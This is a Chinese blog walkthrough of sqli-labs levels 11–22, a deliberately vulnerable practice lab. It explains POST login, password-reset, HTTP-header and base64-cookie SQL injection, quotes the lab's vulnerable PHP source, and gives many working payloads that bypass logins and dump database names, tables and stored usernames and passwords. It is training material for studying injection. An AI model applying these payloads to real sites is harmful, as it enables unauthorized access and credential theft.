sqli-labs(11-22)

最新推荐文章于 2023-07-22 10:46:40 发布
最新推荐文章于 2023-07-22 10:46:40 发布
阅读量137 收藏
点赞数
分类专栏: Web安全 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43395215/article/details/108245645
版权

文章目录

第11关:

前面的都是关于get注入的方式,接下来将是post的注入

post会以表单的形式提交后台

闭合方式:

在登录框内判断

' or '1'='1' #

判断表的列数:

-1' union all select 1,2 #

sql注入:
采用第一关的注入方式

  • 使用sql函数查询系统数据
    • 数据库版本
' union all select 1,version() #
  • 数据库名
' union all select 1,database() #
  • 连接数据库用户
' union all select 1,session_user() #
  • 操作系统
' union all select 1,@@version_compile_os #
  • 查看数据库数据
  • 显示所有数据库名(group_concat() 函数把列转换为行输出)
' union all select 1,group_concat(schema_name) from information_schema.schemata #
  • 显示当前数据库的所有表名
' union all select 1,group_concat(table_name) from information_schema.tables where  table_schema = database() #
  • 显示表的列名
' union all select 1,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'  #
  • 显示username列和password列
' union all select group_concat(password),group_concat(username)  from users #

第12关:

与第11关一样,只是闭合方式不同
判断闭合方式:

") or 1=1 #

第13关:

不显示数据内容,只显示是否登录成功,需要使用布尔盲注 或 xml报错注入 或 双查询注入

闭合方式:

输入“ ’ ”,报错,从报错信息可以知道,闭合方式是“ ') ”

注入方式:

布尔盲注:根据提示信息判断,与sqli-labs 8 一样的方式

xml:根据错误提示信息报错,与sqli-labs 6 一样的方式

双查询注入 :根据错误提示信息报错,结果随机,需要多次判断,与sqli-labs 5 一样的方式

第14关:

与第十三关的方式一样,只是闭合方式不同

闭合方式:
 
" or 1=1 #

第15关:

只有是否登录成功,没有错误提示,判断注入方式为盲注,盲注有两种布尔型和时间型,这里两种都可,但是采用布尔型更有效率

闭合方式:

' or '1'='1' #

第16关:

与第15关一样,只是闭合方式不同
闭合方式:
采用万能公式:

") or 1=1 #

第17关:

到17关我们又遇到了新的难题,这一关是密码重置,按照前面的方式去试都是无效的,我们需要新的方法去找注入点,在这之前,我们可以先阅读以下后台代码,找到它的防御机制

<?php
function check_input($value)
{
if(!empty($value))
{
$value = substr($value,0,15);
}
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
if(isset($_POST['uname']) && isset($_POST['passwd']))
 
{
$uname=check_input($_POST['uname']);  
$passwd=$_POST['passwd'];
 
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
 
if($row)
{
$row1 = $row['username'];          
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
?>

因为17关对用户名是有防御机制的,所以我们在密码上注入sql

  • 首先我们需要一个合法的用户名-admin
  • 然后需要判断闭合方式
User name : admin

New password:' or 1=1 #

执行成功,所以判断为单引号闭合

  • 注入sql语句

采用何种方式注入sql语句,因为有信息提示,所以盲注是可以的,能否报错注入,我们可以判断一下

' and updatexml(1,version(),1) #

输入一个xml报错语句,发现有报错内容,所以判断可以采用报错注入
报错注入的效率肯定要高于盲注,所以这里采用报错注入,注入方式与sqli-labs 5-6 一样,可以选择哪种报错

  • 使用sql函数查询系统数据
    • 数据库版本
 and extractvalue(1,concat(version())) #
  • 数据库名
 and extractvalue(1,concat(0x23,database(),0x23)) #
 and updatexml(1,concat(0x23,database(),0x23),1) #
  • 连接数据库用户
 and extractvalue(1,concat(0x23,user(),0x23)) #
  • 操作系统
and extractvalue(1,concat(0x23,@@version_compile_os,0x23)) #
  • 查看数据库数据
  • 显示所有数据库名(需要多次输出)
and extractvalue(1,mid(concat(0x23,(select group_concat(schema_name) from information_schema.schemata),0x23),1,32)) #
  • 显示当前数据库的所有表名(需要多次输出)
and extractvalue(1,mid(concat(0x23,(select group_concat(schema_name) from information_schema.schemata),0x23),1,32)) #
  • 显示表的列名
and extractvalue(1,mid(concat(0x23,(select group_concat(table_name) from information_schema.tables where  table_schema = database()),0x23),1,32)) #
  • 显示username列和password列
and  extractvalue(1,concat(0x23,(select username from users limit 1,1),0x23)) #

第18关:

按照上一关的打法,没有任何效果,我们判断可能是用户名和密码都做了过滤,我们先用合法的用户名登录(注意第17关的时候修改了admin的密码,需要修改回来),发现返回了我们浏览器的信息。因为我们不了解防御机制,所以需要阅读代码,找到注入点

<?php
function check_input($value)
{
if(!empty($value))
{
$value = substr($value,0,20);
}
if (get_magic_quotes_gpc())
{
$value = stripslashes($value);
}
if (!ctype_digit($value))
{
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
 
if(isset($_POST['uname']) && isset($_POST['passwd']))
 
{
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
 
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
$result1 = mysql_query($sql);
$row1 = mysql_fetch_array($result1);
if($row1)
{
$insert="INSERT INTO `security`.`uagents` (`uagent`, `ip_address`, `username`) VALUES ('$uagent', '$IP', $uname)";
 
?>

根据代码,现在用户名和密码都做了检查,但是有一个sql语句没有检查,就是insert语句,所以我们就找到了一个注入点

这条sql语句的作用是在security库中的ugents中插入一元组,参数为‘uagent’、‘ip_address’、‘username’,其中username是有检查的,但是其他没有,所以利用其他参数做sql注入,与前面不同的是这两参数是浏览器输入的,所以需要对http数据包进行修改,可以使用

burpsuite工具

注意:这里的sql注入与其它不同,不能使用注释符将后面的语句注释,因为使用的是insert语句,要保证插入的参数一致

闭合方式:

根据代码可以知道是单引号闭合

User-Agent: ' and 1='1

注意插入格式

sql注入方式:

xml报错注入,注入语句放在user-agent中

' and updatexml(1,concat('~',(select database())),1) and '1'='1

第19关:

我们先输入正确的用户名和密码,找一找有没有注入点,用户名和密码都是由检查的,所以我们要找其它地方。输入用户名和密码以后有显示Referer的信息,我们可以假设referer是通过插入语句写入到数据库,那么我们就可以找到这个注入点。

判断闭和:

' and updatexml(1,concat('~',(select database())),1) and '1'='1

采用单引号试一下,返回了报错信息,所以判断就是单引号,而且这就是一个注入点

sql注入方式:

报错型注入:双查询、xml

注入语句放在Referer:中

' and updatexml(1,concat('~',(select database())),1) and '1'='1

第20关:

输入用户名和密码出来很内容,这些内容我们是否都可以作为注入点,我们需要判断

User-Agent:' and updatexml(1,concat('~',(select database())),1) and '1'='1

没有任何提示,所以不是注入点

Cookie:username' and updatexml(1,concat('~',(select database())),1) and '1'='1

有xml报错,所以cookie是一个注入点

闭合方式:

' and updatexml(1,concat('~',(select database())),1) and '1'='1

我们再回头阅读代码

<?php
$uname = check_input($_POST['uname']);
$passwd = check_input($_POST['passwd']);
 
$sql="SELECT  users.username, users.password FROM users WHERE users.username=$uname and users.password=$passwd ORDER BY users.id DESC LIMIT 0,1";
 
 
$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";
          
?>

后台代码中有两条select查询语句,第一条的两个参数都经过了检查,但是第二条没有,所以我们就找到了注入点,这个参数就是cookie

username' and updatexml(1,concat('~',(select database())),1) and '1'='1

第21关:

我们利用前一关的方法,对cookie操作时,发现并没有显示结果,我们发现数据包中的cookie是一字符串,我们先通过代码了解一下,这字符串是怎么来的

$cookee = base64_decode($cookee);

代码中有这么一句,也就是说cookee是经过base64_decode处理的,也就是经过编码后在再后台解码,我们知道这是base64编码的,那么我们就可以将sql也变为base64编码,这样在后台就可以执行

闭合构造:

') union all select 1,version(),3 #

注入方式:联合查询、报错注入
Base64编码解码网站
https://tool.oschina.net/encrypt?type=3

  • 使用sql函数查询系统数据
    • 数据库版本
') union all select 1,version(),3 #
JykgdW5pb24gYWxsIHNlbGVjdCAxLHZlcnNpb24oKSwzICM=
  • 数据库名
') union all select session_user(),database(),@@version_compile_os #
JykgdW5pb24gYWxsIHNlbGVjdCBzZXNzaW9uX3VzZXIoKSxkYXRhYmFzZSgpLEBAdmVyc2lvbl9jb21waWxlX29zICM=
 
') and updatexml(1,concat('~',(select database())),1) #
JykgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgnficsKHNlbGVjdCBkYXRhYmFzZSgpKSksMSkgIw==
  • 连接数据库用户
') union all select session_user(),database(),@@version_compile_os #
JykgdW5pb24gYWxsIHNlbGVjdCBzZXNzaW9uX3VzZXIoKSxkYXRhYmFzZSgpLEBAdmVyc2lvbl9jb21waWxlX29zICM=
  • 操作系统
') union all select session_user(),database(),@@version_compile_os #
JykgdW5pb24gYWxsIHNlbGVjdCBzZXNzaW9uX3VzZXIoKSxkYXRhYmFzZSgpLEBAdmVyc2lvbl9jb21waWxlX29zICM=

第22关:

与21关相同,只是换了一个闭合方式
闭合方式:

" and updatexml(1,concat('#',(select database())),1)  #
IiBhbmQgdXBkYXRleG1sKDEsY29uY2F0KCcjJywoc2VsZWN0IGRhdGFiYXNlKCkpKSwxKSAgIw==
初宸
关注
专栏目录
sqli-labs(19)
jimggg的博客
03-20 267
Less-19 POST - Header Injection - Referer field - Error based (基于头部的Referer POST报错注入)
sqli-labs靶场第十九关
gou1791241251的博客
12-30 1004
这一关呢注入点不着账号和密码,在http头部中的referer字段。可以尝试一下输入单引号和双引号进行测试。 注意哈,前提是需要账号密码正确输入的情况下才能注入成功,因为后台会先校验账号密码是否能够查询出结果才会执行referer字段的插入操作。 由图可知啊,输入单引号时页面显示了报错信息,闭合方式为单引号闭合,此时可以使用报错注入。 ',updatexml(1,concat(0x3a,database(),0x3a),1))# 成功爆库。XPATH语法错误。 ...
SQLilabs的第19关——http请求头注入(Referer)(报错注入)
qq_73393033的博客
07-22 392
该语句表示显示第12个字符后面的12个字符(包括第12个字符)。在判断闭合方式时,我们发现该网站会返回错误,说明该网站适合使用报错注入。我们在截取的数据包中的Referer上加上一个'。我们发现数据没有显示完全,我们还使用mid函数,比如输入语句。它显示了Referer,我们大胆猜测注入点在这里。在进行一次验证,在referer的后面输入。这时就不会报错了,可以确定闭合方式是单引号。这说明闭合方式就是'。
Sqlilabs-19
KAKA的博客
07-09 355
第 19 关跟第 18 关类似,User-Agent 改成了 Referer 改造注入 –Referer “浏览器向 WEB 服务器表明自己是从哪个网页 /URL 获得/点击 当前请求中的网址/URL” 同样的,这一关对 usernanme 和 password 都进行了 check_input hackbar 制作针对 referer 的 payload: –查表 1' and extractvalue(1,concat(0x7e,(select table_name from information_
sqli-labs第十九关详解
金 帛的博客
05-05 2408
sqli-labs第十九关详解
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
sqli-labs(php7.3以上可运行)
01-29
sqli-labs提供了多种级别的SQL注入练习,适合初学者到高级安全专家。每个级别都设计了一个具有不同安全漏洞的Web应用,用户可以通过尝试注入SQL语句来解密问题,从而深入理解SQL注入的各种技术和防御策略。 三、PHP...
sqli-lab19关基于post的referer报错注入
qq_46527080的博客
12-18 429
知识点 referer: http请求头里,有一个referer首部,这个首部可以告知服务端,当前的请求的来源。 就是很直观的说,访问了一个页面,你来自哪里 extractvalue()函数 extractvalue() 函数是对XML文档进行查询的函数 其实就是相当于HTML文件中用 标签查找元素一样 语法:extractvalue(目标xml文档,xml路径) update是更新 extractvalue是查询 第十九关 sqlmap方法: 这里我们还是使用SQLMAP进行注入,将登录请求信息保存到1.
sqli-labs(11-20)
errorr0
05-08 490
sqli-labs
sqli-labs (less18-less19)
Xi4or0uji
08-01 1696
less 18 头部注入:user_agent 这里不补充http头的知识了,直接看源码可以看到,uname和passwd都有check_input函数检查,所以直接这两个参数注入是不行的了,然后再继续看下去 有句sql语句有ip_address和uagent两个参数,而且前面没有检查,可以考虑注入,但是ip一般是数字,比较麻烦,所以决定用uagent注入 这里给个脚本,其实重点只是s...
sqli-labs 11-20关
sy15890481860的博客
02-09 641
sqli-labs 11-20关 Less-11: 从这一关开始就进入了post的世界 进入页面 随便输入出现报错信息 我们在输入框输入万能密码尝试一下admin'or'=1'#,密码随意。返回正确的结果。 详情看上篇文章 Less-12: 闭合方式") Less-13: 闭合方式**’)**。这里可以用下布尔类型的盲注。猜数据库的第一位,然后挨着对每一位进行测试。 Less-14: 双引号闭...
sqli-labs-master第18、19关
m_ing
05-15 1410
第18关: http://192.168.89.134/sqli-labs-master/Less-18/ 看到页面提示,和关卡提示POST - Header Injection - Uagent field - Error based 后置报头注入-Uagent字段-基于错误和我的ip地址:192.169.89.1. 我们一时没有头绪,那就直接看源代码 又看到 insert语句,他把user-agent插入到了数据库,所以可以从这里下手,而且看的出来是单引号型,接下来开始爆破。 需要使用抓包工具,更改
sqli-labs18、19关详解
weixin_43061418的博客
09-01 2054
18关 对两个输入框都进行了设置,所以只能寻找其他注入点 看到insert语句从uagents插入 我们可以 19关 可以看到将uname放在了referer里面 就像18关那样去修改Referer里面的就好了
sqli-labs解题大法18~20
weixin_43733035的博客
01-22 906
Less-18: 这一关看过源码后发现username和password都进行了check_input,然后瞬间迷茫了,两个输入的地方都没办法进行注入了啊。后来看了下源码,发现了一个insert 这里可以用burp_suite来进行抓包修改,软件安装参考 [burp的安装]:(https://blog.csdn.net/weixin_43733035/article/details/8659354...
sqli-labs(18)
jimggg的博客
03-20 220
Less-18 POST - Header Injection - Uagent field - Error based (基于错误的用户代理,头部POST注入)
XSS攻击-xss-lab(1-10)详细讲解
qq_43395215的博客
05-06 9318
xss概述 ​ XSS,全称跨站脚本,XSS跨站脚本(Cross-Site Scripting,XSS(与css-层叠样式表冲突,所以命名为xss)),某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要注意的是,XSS不仅仅扩展JavaScript,还包括flash等其他脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存...
SQLi-Labs靶场安装教程:PHPStudy与MySQL配置
"sqli-labs-master靶场安装下载" 本文将详细介绍如何在本地环境中安装和配置sqli-labs靶场,该靶场用于学习和实践SQL注入攻击的防御技巧。sqli-labs是一个非常实用的在线安全训练平台,适合初学者熟悉SQL注入漏洞的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值